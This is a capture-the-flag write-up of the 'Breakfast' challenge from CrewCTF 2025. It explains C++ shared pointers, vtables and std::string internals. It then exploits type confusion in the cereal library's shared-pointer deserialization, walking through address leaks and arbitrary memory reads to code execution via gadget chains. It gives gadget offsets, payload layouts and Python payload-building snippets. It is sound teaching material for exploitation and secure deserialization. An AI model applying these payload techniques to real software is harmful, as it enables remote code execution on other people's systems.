Sharing is Caring: Arbitrary Code Execution for Breakfast
Binary exploitation in C++, gadget mania, and a new form of deserialization attack.
Breakfast is a CTF challenge I designed for CrewCTF 2025. With deserialization attacks being in vogue, I wanted to explore the topic in C++ and as a result, found an interesting niche bug in the cereal library. In this writeup, we'll revisit C++ internals and explore binary exploitation techniques beyond ROP. We’ll learn how even a properly written C++ program could be vulnerable to remote code execution through insecure deserialization.
In a future post, I will share a more detailed writeup on the research. But for now, let's have fun and focus on the challenge. :)
The Challenge
The CTF has ended, but the binaries are public! If you want to try solving it or want to follow along, you can grab the challenge distribution pack here!
- Name: Breakfast
- Solves: 11
- Difficulty: Easy-Medium?
- Description:
They say breakfast is the most important meal of the day. But sometimes you just need milk to avoid Confusing your favourite Type of cereal…
The code is short, but don't let that fool you. A lot of complexity is abstracted away by the cereal library.
The code first outputs the serialization of three types: Congee, Toast, and Fruit. Then it enters a loop which deserializes input and prints the deserialized values.
Running it in the terminal:
C++ Internals Redux
To better understand the program and how the exploitation works, let's review some C++!
If you're familiar, you may want to skip ahead to the analysis.
What are shared pointers?
Shared pointers (std::shared_ptr) are smart pointers in C++ that enable multiple pointers to manage the lifetime of a single object. They use reference counting to track how many shared pointers point to the same dynamically allocated resource. The object is automatically deleted when the last remaining shared_ptr pointing to it is destroyed or reset. This provides automatic memory management while allowing shared ownership.
Key Point for Exploitation: Multiple shared pointers may share a single object. This often complicates serialization, and may lead to bugs if improperly implemented.
Example:
Output:
What are virtual tables?
A vtable (virtual table) is the mechanism that enables runtime polymorphism in C++.
Each virtual class (any class containing virtual functions) has one corresponding virtual table (vtable).
Example of how virtual classes, vtables, and overriding virtual functions are implemented. Credit: Pablo Arias
The vtable stores an array of virtual functions.
Each object of a virtual class holds a virtual pointer (vpointer) which points to the vtable of the class it was instantiated as. The vpointer is a “hidden first member” and precedes other members.
When a virtual function is called, dynamic dispatch is carried out by looking up the vtable then jumping to a function at a hard-coded offset. In assembly, this could be seen as a double dereference.
For further reading, I recommend checking out: Understanding Virtual Tables in C++ by Pablo Arias and this StackOverflow Q&A.
Key Points for Exploitation: 1) If an attacker controls the vpointer, they can hijack control flow. 2) The vpointer is the first member of any object of a virtual class.
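To make the double dereference concrete, here is a toy model in Python, with a dict standing in for process memory. Every address, as well as the names `FUNCTIONS` and `virtual_call`, is invented for illustration; it is a sketch of the idea rather than an exact picture of what a compiler emits.

```python
# Toy model of dynamic dispatch: a dict stands in for process memory.
# Every address below is invented for illustration.
FUNCTIONS = {0x3000: "Toast::eat", 0x6666: "attacker gadget"}


def virtual_call(memory, obj_addr, slot=0):
    """Resolve a virtual call the way compiled code does: two loads, then a call."""
    vptr = memory[obj_addr]            # 1st dereference: object -> vpointer
    target = memory[vptr + 8 * slot]   # 2nd dereference: vtable slot -> function address
    return FUNCTIONS[target]


memory = {
    0x1000: 0x2000,  # object at 0x1000: the hidden first member is the vpointer
    0x2000: 0x3000,  # vtable at 0x2000: slot 0 holds the address of Toast::eat
}
print(virtual_call(memory, 0x1000))  # Toast::eat

# If an attacker controls the object's bytes, the vpointer can be aimed at data
# they also control, so the "vtable" can live inside the object itself.
memory[0x1000] = 0x1008  # vpointer now points just past itself
memory[0x1008] = 0x6666  # fake vtable, slot 0
print(virtual_call(memory, 0x1000))  # attacker gadget
```

The second half mirrors the trick used later in this writeup, where the vpointer points back into the same attacker-controlled object.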
What is an std::string?
We all know what a string is in programming, but what does C++'s std::string look like?
If we dig into the source code, we see the (GCC) implementation is roughly equivalent to:
Ignoring short-string optimisation and other factors, an std::string simply consists of three members: the buffer (a pointer to the actual characters), the size, and the capacity of the dynamically allocated memory.
This allows for a growable string, suitable for dynamic operations such as append, replace, and remove.
Key Point for Exploitation: If we control buffer and can observe the string, we can achieve arbitrary memory read.
Analysis
Initial Analysis
First step: Understanding what we have, aka enumeration. What protections are in place? What attack primitives are available?
Protections are typically easy to check. Running checksec, we see NX is enabled, which means shellcode is out of the question. PIE and, by default, ASLR are also enabled, so we'll want some kind of address leak to do anything useful.
Looking at the code, we see 3 classes deserialized.
Cereal supports serialization of std::shared_ptr. But how are shared references handled?
Cereal's JSON format uses an id key for shared pointers. If id is greater than 2 << 30 (2147483648), i.e. the top bit of the 32-bit id is set, then the object is new and memory should be allocated for it. Otherwise, the object was seen before and the old std::shared_ptr should be copied.
For instance, here's a sample JSON cereal-isation containing shared references:
In the example above, 2147483649 and 2147483650 refer to new objects with ID 1 and 2. Memory is dynamically allocated, and object data is deserialized. Afterwards, the deserializer encounters "id": 1, which refers to the first object. No new data is deserialized, and the first std::shared_ptr is copied.
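The id convention can be sketched in a few lines of Python. This assumes the "new object" flag is simply the top bit of a 32-bit value (the 2147483648 threshold above); `decode_id` is a hypothetical helper for illustration, not a cereal function.

```python
MSB_32BIT = 0x80000000  # 2147483648, i.e. 2 << 30


def decode_id(raw_id):
    """Split a serialized id into (is_new_object, object_number)."""
    is_new = bool(raw_id & MSB_32BIT)
    return is_new, raw_id & 0x7FFFFFFF


for raw in (2147483649, 2147483650, 1):
    print(raw, decode_id(raw))
```

Under that assumption, 2147483649 decodes to a new object numbered 1, and a bare 1 decodes to a back-reference to that same object.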
We've figured out how Cereal handles shared references, but how can we apply it to the challenge?
Well, what if we force a shared reference, even if the deserialized types are different?
Type Confusion Primitives
It turns out Cereal does not perform type checking on shared pointers. If the deserialization handles multiple types, we can abuse it for type confusion!
I'll share a deep-dive into the type confusion primitives in a future post. For now, it suffices to understand what primitives are available in this challenge and how to achieve those primitives.
Here are the types again, for reference:
And the primitives available:
If we deserialize a... | followed by a... | we get... | because we... |
---|---|---|---|
Toast | Fruit | Address Leak (ASLR Bypass) | leak the vtable |
Congee | Fruit | Arbitrary Memory Read | control string internals |
Congee | Toast | Control Flow Hijacking | control the vpointer |
If the table doesn't make sense, perhaps this diagram demonstrating an address leak will help:
The program thinks the memory at 0x4000 is a Fruit, but surprise! It's actually a Toast. When Fruit::name is printed, what's actually printed is the vtable entry of Toast.
Together, these primitives are enough to obtain arbitrary code execution!
Exploitation
Great, we've found the chink in the armor. Now let's draft a plan of attack.
- Leak the VTable address. (Toast → Fruit) We can use this to calculate the base address of the binary and offsets to other locations (e.g. GOT entries). This will be useful to bypass ASLR/PIE.
- Leak a libc/libcpp address. (Congee → Fruit) This allows us to calculate offsets to gadgets.
- Find a heap address. (Congee → Fruit) We'll need this address for the next step.
- Hijack control flow to point to a crafted gadget chain. (Congee → Toast) We'll use the 64 bytes available in Congee to plant a fake vtable containing a gadget chain. When the virtual function is called, the chain is triggered.
Leaking the VTable
Leaking the vtable is rather straightforward. We simply set the id of the Fruit object to refer to the Toast object. But wait: since Fruit is a string, we should make sure the size is non-zero. Luckily, we can control the size using the spread parameter.
To recap, by type-confusing Fruit and controlling spread, we map Toast's vpointer to Fruit's string buffer and Toast's spread parameter to Fruit's string size.
When deserialized, t and f share the same object. When *f is printed, it will dereference the string buffer (vpointer) and print the first entry of the vtable, which is Toast::eat.
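As a rough sketch of how such a request could be built, the snippet below patches a JSON document so that the Fruit entry becomes a back-reference to the Toast entry. It assumes value1 is the Toast and value2 is the Fruit, and that a back-reference is an id with no data. The template in the usage note is a stand-in containing only those fields; the real JSON printed by the binary has more. `make_leak_request` is a hypothetical helper name.

```python
import copy
import json

MSB_32BIT = 0x80000000  # "new object" flag on a shared pointer id


def make_leak_request(template, nbytes=8):
    """Point value2 (Fruit) at the object created for value1 (Toast)."""
    doc = copy.deepcopy(template)
    toast = doc["value1"]["ptr_wrapper"]
    toast["data"]["spread"] = nbytes          # read back as the Fruit string's size
    back_ref = toast["id"] & 0x7FFFFFFF       # same object number, flag cleared
    doc["value2"]["ptr_wrapper"] = {"id": back_ref}  # no data: "seen before"
    return json.dumps(doc)
```

For example, with a stand-in template such as `{"value1": {"ptr_wrapper": {"id": 2147483650, "data": {"spread": 1}}}, "value2": {"ptr_wrapper": {"id": 2147483651, "data": {"name": "x"}}}}`, the result keeps Toast's id and rewrites value2 to `{"ptr_wrapper": {"id": 2}}`.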
We can do a quick PoC with xxd, which allows us to view nonprintable bytes. By changing the initial JSON's value1.ptr_wrapper.data.spread and value2.ptr_wrapper.id fields, we can induce the binary to spit out 8 weird bytes, which happen to be an address leak of 0x560864bd50c2! (Hint: It's in little endian, so read the leaked number backwards.)
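Reading the number backwards by hand gets old quickly, so here is a small sketch of the conversion. The byte string is reconstructed from the address quoted above, assuming the two most significant bytes of the 8-byte leak are zero; `parse_leak` is a hypothetical helper name.

```python
def parse_leak(raw):
    """Interpret the first 8 leaked bytes as a little-endian 64-bit address."""
    return int.from_bytes(raw[:8], "little")


leaked = bytes.fromhex("c250bd6408560000")  # the bytes as xxd would show them
print(hex(parse_leak(leaked)))  # 0x560864bd50c2
```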
(Note: If an image ever looks too small, try clicking and zooming in on it.)
Arbitrary Memory Read!
Now that we have an address from the binary, we can continue on our warpath by leaking a libc address. We’ll use the Congee → Fruit primitive which allows control over the properties of an std::string and grants us arbitrary memory read!
We'll use the GOT entry of malloc as the string buffer. GOT entries sit at a fixed offset from the binary's base, so we can calculate the entry's address using our earlier vtable leak. When the string is printed, the GOT entry will be dereferenced and the address of malloc printed.
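The arithmetic and the fake string can be sketched as follows. Both offsets in the demo are placeholders that would have to be read from the actual binary, and setting the capacity equal to the size is my own simplification. The layout assumes Congee is 8 quadwords whose first three overlap the string's buffer, size, and capacity. All helper names are hypothetical.

```python
import struct


def pie_base_from_leak(toast_eat_leak, toast_eat_offset):
    """Recover the binary's load address from the leaked Toast::eat pointer."""
    base = toast_eat_leak - toast_eat_offset
    if base & 0xFFF:
        raise ValueError("base is not page-aligned; the offset is probably wrong")
    return base


def fake_string_quads(read_addr, nbytes):
    """First three Congee quadwords, viewed as an std::string."""
    return [read_addr, nbytes, nbytes]  # buffer, size, capacity (capacity is a guess)


def pack_congee(quads):
    """Pad to 8 quadwords (64 bytes) and pack little-endian."""
    quads = list(quads) + [0] * (8 - len(quads))
    return struct.pack("<8Q", *quads)


# Placeholder offsets, NOT taken from the challenge binary.
TOAST_EAT_OFFSET = 0x40C2   # hypothetical offset of Toast::eat
MALLOC_GOT_OFFSET = 0x7F50  # hypothetical offset of malloc's GOT entry

base = pie_base_from_leak(0x560864BD50C2, TOAST_EAT_OFFSET)
payload = pack_congee(fake_string_quads(base + MALLOC_GOT_OFFSET, 8))
print(hex(base), payload.hex())
```

How the 64 bytes are encoded in the request depends on how Congee is serialized, which this sketch leaves out.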
Finding the Heap Address
Why do we need a heap address?
During the final stage of type confusion, we will be controlling a malicious vpointer (not the vtable!). To actually get control flow hijacking, we want the vpointer to point to a vtable, which will be our custom-crafted payload placed among the 7 remaining quadwords of Congee. Thus, we need a heap address to the chunk where Congee will be allocated.
To get a heap address leak, we can use the same memory read primitive and target an address which contains a heap address. There are several approaches.
- One way is to obtain the main arena, which can be found at libc offset +0x203ac0. This then necessitates a convoluted hunt for heap addresses through a sea of indirection.
- Alternatively, a simpler method I observed from submissions is to take advantage of the cereal::base64::chars string declared globally in the binary. By reading from this memory, we can leak the heap-allocated buffer of cereal::base64::chars.
For the sake of simplicity, we'll stick with the cereal::base64::chars method.
Finding Congee's Address
By observation, Congee’s address remains unchanged between iterations. This means if we know the address of Congee this iteration, we can reuse that address next iteration.
Interestingly, the offset of c from the heap's base address is constant, and we can calculate it to be +0x131c0… at least locally.
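As a small sketch of that calculation: given the leaked buffer pointer and that buffer's offset from the heap base, Congee's address is one subtraction and one addition away. The buffer's offset is not stated in this writeup, so it is left as a parameter to be measured in a debugger; `congee_address` is a hypothetical helper name.

```python
CONGEE_HEAP_OFFSET = 0x131C0  # offset of Congee from the heap base, observed locally


def congee_address(chars_buf_leak, chars_buf_heap_offset):
    """Derive Congee's address from the leaked cereal::base64::chars buffer pointer."""
    heap_base = chars_buf_leak - chars_buf_heap_offset
    return heap_base + CONGEE_HEAP_OFFSET


# Made-up numbers purely to show the arithmetic.
print(hex(congee_address(0x55555556B2B0, 0x2B0)))  # 0x55555557e1c0
```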
Finding Congee's Address: Less Hacky Method
Perhaps that seems too hacky or inelegant to some. What if the offset was random? That would likely be the case in a more complex C++ program, one with heaps of memory allocation and deallocation. In that case, I offer an alternative approach.
We can use the bytes in Congee to store a canary/needle, i.e. some kind of fixed string or pattern. Using our leaked heap address as a reference, we'll perform a giant memory read (e.g. 0x1000 bytes) and look for the needle.
In the following code, we'll look for the fixed pattern ABCD (0x41424344) in Congee.
Arbitrary Code Execution (ACE) via Gadget Chains
We finally have enough information to get code execution! To do so, we will construct a gadget chain in Congee and craft the payload such that the virtual function call t->eat() will trigger the chain.
1) When toast->eat() is called, the vtable is looked up. Due to type confusion, it actually uses a vpointer we control. 2) We control the vpointer to point to a vtable within the same Congee payload. The vtable contains a gadget which is called.
Essentially, by controlling the vpointer and vtable, we control the virtual function being called. But how do we craft a malicious function? The answer lies in gadgets.
PCOP / JOP
Classic ROP gadgets end in ret. Upon hitting the ret, the instruction pointer is set to the next item on the stack. Hence, gadgets can be chained by writing a block of memory to the stack.
PCOP and JOP gadgets are similar, but end in different instructions.
- PCOP (Pure Call Oriented Programming): ends in call SOMETHING, which directly jumps to the next gadget.
- JOP (Jump Oriented Programming): ends in a jmp/call which jumps to a dispatcher, before jumping into a table of gadgets. The dispatcher's job is to increment a "gadget pointer" before jumping to the next gadget. [1]
The advantage of PCOP/JOP is that they don't rely on the stack, preferring instructions such as mov and call over stack-based instructions such as pop and ret.
- ROP Gadget: pop rax; ret
- PCOP/JOP Gadget: mov rax, [rdi+8]; call [rax+0x10]
Approach 1: libstdc++ & One-Gadget
Funnily enough, this was the first working solution I came up with— and it's also the shortest payload I've seen so far (4 quads!).
A One-Gadget is a gadget which pops a shell if certain conditions are met. We can find these gadgets using the one_gadget tool.
Looks like we found 4 one-gadgets. Each gadget lists the offset along with the constraints required to successfully trigger a shell. But to satisfy the constraints, we should first understand the state of the registers at the moment the virtual function is called. This calls for some breakpoints!
Disassembly and registers upon reaching Toast::eat(), reachable via b *main+1121; si.
By navigating to Toast::eat(), we notice the following interesting register states:
- rax == rdi: non-controllable, address of virtual object (&*t)
- rdx: controllable, first address to jump to
- rsi == r13 == 0
Our attention then turns to fulfilling the one-gadget constraints. I decided to look for gadgets supporting the third one-gadget (offset 0xef4ce) due to the relatively simple conditions: we just need rbx = r12 = 0. We can hunt for gadgets with tools such as ROPgadget or xgadget. The gadgets we're looking for should:
- Overwrite (or provide some control over) the desired registers.
- End in a call instruction that jumps to a controllable location, such as an offset within Congee, e.g. call [rax+0x10].
- Not rely on the stack. This excludes any gadget containing pop, leave, or ret. [2]
Output of xgadget --reg-overwrite r12 --jop /usr/lib/x86_64-linux-gnu/libstdc++.so.6. We found a useful mov r12, rsi gadget which sets r12 to 0. Additionally, the gadget will go to [rax+0x10], meaning we can place another gadget at the +0x10 offset to continue the chain.
After a while, we ended up with two simple gadgets from libstdc++. Constructing the final payload is simply a matter of cooking congee with the right ingredients:
Congee Ingredients:
Offset | Value | Purpose |
---|---|---|
0x00 | address of Congee + 0x08 | vpointer, points to offset 0x08 |
0x08 | libstdcpp + 0xf0a0c | first gadget, mov r12, rsi; call qword ptr [rax+0x10]; |
0x10 | libstdcpp + 0xf5e83 | second gadget, mov rbx, rsi; ... call qword ptr [rax+0x18]; |
0x18 | libc + 0xef4ce | one-gadget, sweet sweet code execution! |
The gadget flow is extremely straightforward:
- VTable is at Congee address + 0x08 →
- gadget at 0x08 (set r12 to 0) →
- gadget at 0x10 (set rbx to 0) →
- gadget at 0x18 (one-gadget ACE).
Putting it all together, we get ACE.
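The ingredients table translates fairly directly into a packing routine. The sketch below uses the offsets from the table and assumes the three base/heap addresses have already been leaked; the remaining four quadwords are zero-filled, which is my own choice. `build_one_gadget_congee` is a hypothetical helper name, and the addresses in the demo are made up.

```python
import struct

GADGET_SET_R12 = 0xF0A0C  # libstdc++: mov r12, rsi; call qword ptr [rax+0x10]
GADGET_SET_RBX = 0xF5E83  # libstdc++: mov rbx, rsi; ... call qword ptr [rax+0x18]
ONE_GADGET = 0xEF4CE      # libc: one-gadget that needs rbx == r12 == 0


def build_one_gadget_congee(congee_addr, libstdcpp_base, libc_base):
    """Pack the 64-byte Congee body for the libstdc++ + one-gadget chain."""
    quads = [
        congee_addr + 0x08,               # 0x00: vpointer -> fake vtable at +0x08
        libstdcpp_base + GADGET_SET_R12,  # 0x08: first gadget (fake vtable slot 0)
        libstdcpp_base + GADGET_SET_RBX,  # 0x10: second gadget
        libc_base + ONE_GADGET,           # 0x18: one-gadget
        0, 0, 0, 0,                       # unused quadwords
    ]
    return struct.pack("<8Q", *quads)


# Made-up addresses, only to show the resulting layout.
body = build_one_gadget_congee(0x55555557E1C0, 0x7FFFF7C00000, 0x7FFFF7800000)
for off in range(0, 0x20, 8):
    print(hex(off), hex(struct.unpack_from("<Q", body, off)[0]))
```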
Approach 2: system("/bin/sh") Gadget Chain
Credit: Adapted from @erge’s and @lolc4t’s solutions.
I'm sure this gadget chain feels closer to home for ROPpers. The chain works by setting rdi to "/bin/sh" and calling the system function. Despite the need for 6 quads in Congee, I find the chain rather fascinating as it condenses multiple steps into 2 clever gadgets.
Another nice aspect about this chain is that it does not rely on too much register state: only rax and rdi are used. (The libstdc++ and one-gadget chain relies on rsi = 0, which may not always be the case.)
Congee Ingredients:
Offset | Value | Purpose |
---|---|---|
0x00 | address of Congee + 0x10 | vpointer |
0x08 | address of Congee + 0x18 | address of [system, binsh, gadget2] structure |
0x10 | libc + 0x1740b1 | first gadget, mov rax, [rdi+8]; call [rax+0x10] |
0x18 | system | sweet sweet code execution! |
0x20 | &"/bin/sh" | address of any /bin/sh string |
0x28 | libc + 0xa5688 | second gadget, mov rdi, [rax+8]; call [rax] |
Here's the call flow:
- VTable is at Congee address + 0x10 →
- gadget at 0x10 (set rax to *(rdi+0x08), i.e. the second Congee entry, or in other words: rax = rax + 0x18) →
- gadget at 0x28 (set rdi to "/bin/sh") →
- gadget at 0x18 (system ACE).
To make this gadget chain work, we require system, the "/bin/sh" pointer, and the 0xa5688 gadget to be contiguous in memory. This is because after the mov rax in the first gadget, the subsequent call [rax+0x10] triggers the second gadget, which loads [rax+0x08] into rdi before executing call [rax]. Each entry in this relative +0x10, +0x08, and +0x00 structure has its own role to play.
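To double-check the layout, it helps to walk the chain on paper, or in a few lines of Python. The sketch below packs the ingredients from the table and then replays the two gadgets' loads against the packed bytes, assuming rax == rdi == the Congee address on entry (as observed at Toast::eat). The function names are hypothetical, and system and the "/bin/sh" address are passed in rather than resolved.

```python
import struct

G1_OFF = 0x1740B1  # libc: mov rax, [rdi+8]; call [rax+0x10]
G2_OFF = 0xA5688   # libc: mov rdi, [rax+8]; call [rax]


def build_system_congee(congee, libc_base, system, binsh):
    """Pack the 64-byte Congee body for the system("/bin/sh") chain."""
    quads = [
        congee + 0x10,       # 0x00: vpointer -> fake vtable at +0x10
        congee + 0x18,       # 0x08: pointer to the [system, binsh, gadget2] block
        libc_base + G1_OFF,  # 0x10: first gadget (fake vtable slot 0)
        system,              # 0x18: block + 0x00
        binsh,               # 0x20: block + 0x08
        libc_base + G2_OFF,  # 0x28: block + 0x10
        0, 0,                # unused quadwords
    ]
    return struct.pack("<8Q", *quads)


def trace_chain(payload, congee, libc_base):
    """Replay the gadgets' memory loads; return (final call target, rdi)."""
    def load(addr):
        return struct.unpack_from("<Q", payload, addr - congee)[0]

    rax = rdi = congee
    target = load(load(rdi))    # t->eat(): load vpointer, then vtable slot 0
    assert target == libc_base + G1_OFF
    rax = load(rdi + 8)         # gadget 1: mov rax, [rdi+8]
    target = load(rax + 0x10)   #           call [rax+0x10]
    assert target == libc_base + G2_OFF
    rdi = load(rax + 8)         # gadget 2: mov rdi, [rax+8]
    target = load(rax)          #           call [rax]
    return target, rdi
```

With any consistent set of addresses, `trace_chain(build_system_congee(c, base, system, binsh), c, base)` should come back as `(system, binsh)`, which is exactly the call we want.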
The order of the other gadgets doesn’t matter as much. Here’s one of the solves from the CTF community. Notice how the first gadget (libc + 0x1740b1) is placed at the end of the Congee payload instead of at offset 0x10.
Alternative solution by @lolc4t.
Conclusion
This was an interesting challenge to make as it helped refresh my binary exploitation skills despite me sucking at pwn challenges. I was also happy that players came up with different solutions, challenging my biases on what makes a successful gadget chain.
Overall, this has been a fun experience exploring and exploiting a niche use case of C++ serialization libraries. I have a few variant challenges I might present in future CTFs. We'll see if they make it out.
Special thanks to thehackerscrew CTF team for hosting my CTF challenge and to the players who opened my mind by sharing their solves.
Solve Script
Flag
Footnotes
[1] For further reading on JOP, I recommend reading this StackExchange answer: Security.SE: Concept of Jump-Oriented-Programming (JOP). It provides an excellent summary and brief history on ROP/JOP.
[2] We exclude stack-based gadgets to simplify the exploit, even if an attack with such gadgets may be possible. The reason for doing so is that we don’t have direct control over stack memory. We would need the help of gadgets to push/modify the stack. Even then, modifying the stack without fine-grained control potentially crashes the program. So we explore other alternatives first.